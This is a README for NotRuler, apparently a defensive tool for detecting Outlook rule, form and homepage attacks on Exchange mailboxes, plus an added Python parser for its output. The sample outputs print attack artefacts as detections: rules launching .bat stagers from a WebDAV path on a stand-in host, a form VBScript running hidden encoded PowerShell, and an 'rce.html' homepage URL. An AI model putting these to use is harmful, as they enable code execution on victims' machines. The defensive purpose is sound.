sensepost / Notruler
Introduction
NotRuler is the opposite of Ruler. The tool aims to make life a little easier for Exchange Admins by allowing for the detection of both client-side rules and VBScript enabled forms. At a minimum this should allow for the detection of all attacks created through Ruler.
NotRuler allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol.
What does it do?
NotRuler can query one or more Exchange mailboxes and detects client-side Outlook rules and VBScript enabled forms.
- Allows Exchange Admins to check for compromise
- Check your own account for compromise
- Extract stager address for Malicious rules
- Extract VBScript used in forms
- Check for 'homepage' and extract URL
Getting Started
Compiled binaries for Linux, OSX and Windows are available. Find these in Releases. Information about setting up Ruler from source is found in the [getting-started guide].
Usage
NotRuler has the following modes of operation:
- Rules -- check for client-side rules
- Forms -- check for VBScript enabled forms
- Homepage -- check for a custom homepage
Rules
The current version of NotRuler can check either a single or multiple mailboxes. These are supplied in the program arguments.
To check multiple mailboxes, create a file with one account per line:
[email protected]
[email protected]
[email protected]
[email protected]
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list rules
You can also check your own account by using --self:
./notruler --username [email protected] --mailbox [email protected] --self rules
Sample output:
[+] Checking [[email protected]]
[+] Found 5 rules
[WARNING] Found client-side rule: [01000000d97851c4:pewpew3] Application: [\\myhost.somewhere.darkside.com\dav\morebad.bat]
[WARNING] Found client-side rule: [01000000d97851b9:pewpew] Application: [\\myhost.somewhere.darkside.com\dav\bad.bat]
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
Forms
Same as with Rules, you need to either have a list of mailboxes or a single mailbox to check. Simply swap "rules" for "forms":
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list forms
You can also check your own account by using --self:
./notruler --username [email protected] --mailbox [email protected] --self forms
Sample output:
[+] Checking [[email protected]]
[WARNING] Found form with VBScript! [IPM.Note.badform]
Function P()
CreateObject("Wscript.Shell").Run "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAHgAcABlAGMAVAAxADAAMABDAG8ATgB0AGkATgBVAEUAIA=="
[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
Homepage
The same applies again: you need either a list of mailboxes or a single mailbox to check.
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list homepage
You can also check your own account by using --self:
./notruler --username [email protected] --mailbox [email protected] --self homepage
Sample output:
[+] Checking [[email protected]]
[WARNING] Found endpoint: http://attack.attackpew.com/rce.html
[+] Webview is set as ENABLED
[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
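The three modes above all report through the same line format, so a sweep over many mailboxes is easiest to act on when the WARNING lines are turned into structured findings: which mailbox, which kind of artefact (rule, form or homepage), and which remote host the stager path, form script or homepage URL points at. The parser below is an added example written for this README, not part of NotRuler itself. Its sample input is constructed to match the Rules, Forms and Homepage outputs shown above: the hosts are the README's own example hosts, the mailbox addresses are placeholders (the README's are obfuscated), and the VBScript body is a harmless placeholder rather than the encoded PowerShell from the Forms sample.

```python
"""Turn NotRuler rules/forms/homepage output into structured findings (example, not NotRuler code)."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample: the three README outputs merged into one run. Placeholder
# mailboxes; hosts copied from the README samples; VBScript body is a placeholder.
SAMPLE_OUTPUT = r"""
[+] Checking [alice@example.invalid]
[+] Found 5 rules
[WARNING] Found client-side rule: [01000000d97851c4:pewpew3] Application: [\\myhost.somewhere.darkside.com\dav\morebad.bat]
[WARNING] Found client-side rule: [01000000d97851b9:pewpew] Application: [\\myhost.somewhere.darkside.com\dav\bad.bat]
[+] Checking [bob@example.invalid]
[+] No Rules Found
[+] Checking [carol@example.invalid]
[WARNING] Found form with VBScript! [IPM.Note.badform]
Function P()
MsgBox "placeholder body"
End Function
[+] Checking [dave@example.invalid]
[WARNING] Found endpoint: http://attack.attackpew.com/rce.html
[+] Webview is set as ENABLED
"""

# Line shapes as printed by NotRuler in the README samples.
RE_CHECKING = re.compile(r"^\[\+\] Checking \[(?P<mailbox>[^\]]+)\]$")
RE_RULE = re.compile(r"^\[WARNING\] Found client-side rule: \[(?P<rule_id>[^:\]]+):(?P<name>[^\]]*)\]"
                     r" Application: \[(?P<app>[^\]]+)\]$")
RE_FORM = re.compile(r"^\[WARNING\] Found form with VBScript! \[(?P<form_class>[^\]]+)\]$")
RE_HOMEPAGE = re.compile(r"^\[WARNING\] Found endpoint: (?P<url>\S+)$")
RE_WEBVIEW = re.compile(r"^\[\+\] Webview is set as (?P<state>\w+)$")


@dataclass
class Finding:
    mailbox: str
    kind: str                                        # "rule", "form" or "homepage"
    indicator: str                                   # application path, form class or homepage URL
    host: str = ""                                   # remote host the indicator points at, if any
    extra: dict = field(default_factory=dict)        # rule id/name, webview state
    script: list[str] = field(default_factory=list)  # VBScript body printed under a form warning


def host_of(indicator: str) -> str:
    """Remote host named by a UNC path (\\\\host\\share\\file) or a URL; '' if neither."""
    if indicator.startswith("\\\\"):
        return indicator.lstrip("\\").split("\\", 1)[0].lower()
    return (urlparse(indicator).hostname or "").lower()


def parse_notruler_output(text: str) -> list[Finding]:
    """Walk the output once, attributing every WARNING to the mailbox being checked."""
    findings: list[Finding] = []
    mailbox = None
    current_form = None  # form finding still collecting its script lines
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if m := RE_CHECKING.match(line):
            mailbox, current_form = m["mailbox"], None
        elif mailbox is None:
            continue  # ignore anything before the first "Checking" header
        elif m := RE_RULE.match(line):
            current_form = None
            findings.append(Finding(mailbox, "rule", m["app"], host_of(m["app"]),
                                    {"rule_id": m["rule_id"], "name": m["name"]}))
        elif m := RE_FORM.match(line):
            current_form = Finding(mailbox, "form", m["form_class"])
            findings.append(current_form)
        elif m := RE_HOMEPAGE.match(line):
            current_form = None
            findings.append(Finding(mailbox, "homepage", m["url"], host_of(m["url"])))
        elif m := RE_WEBVIEW.match(line):
            # The webview state line follows the endpoint line for the same mailbox.
            for f in reversed(findings):
                if f.mailbox == mailbox and f.kind == "homepage":
                    f.extra["webview"] = m["state"]
                    break
        elif current_form is not None and not line.startswith("["):
            current_form.script.append(line)  # unprefixed lines are the form's VBScript
        else:
            current_form = None  # any other status line ends the script body
    return findings


def compromised_mailboxes(findings: list[Finding]) -> list[str]:
    """Mailboxes with at least one finding, for follow-up with their owners."""
    return sorted({f.mailbox for f in findings})


def remote_hosts(findings: list[Finding]) -> list[str]:
    """Every remote host a finding points at: candidates for blocking and log hunting."""
    return sorted({f.host for f in findings if f.host})


if __name__ == "__main__":
    results = parse_notruler_output(SAMPLE_OUTPUT)
    for f in results:
        print(f"{f.mailbox}: {f.kind} -> {f.indicator} (host={f.host or '-'}) {f.extra}")
    print("mailboxes to review:", compromised_mailboxes(results))
    print("hosts to hunt for:", remote_hosts(results))
```

In practice you would feed it the captured output of a `--mailboxes` run (`./notruler ... rules > rules.txt`, and likewise for forms and homepage) and cross-check the extracted hosts against proxy and DNS logs; a UNC stager path such as the one in the Rules sample is also a reason to look for outbound SMB/WebDAV from the affected user's workstation.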
IOCs
I've added a list of IOCs here: iocs.md
Feel free to submit Issues/PRs with further IOCs!
License
NotRuler is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/). Permissions beyond the scope of this license may be available at http://sensepost.com/contact/.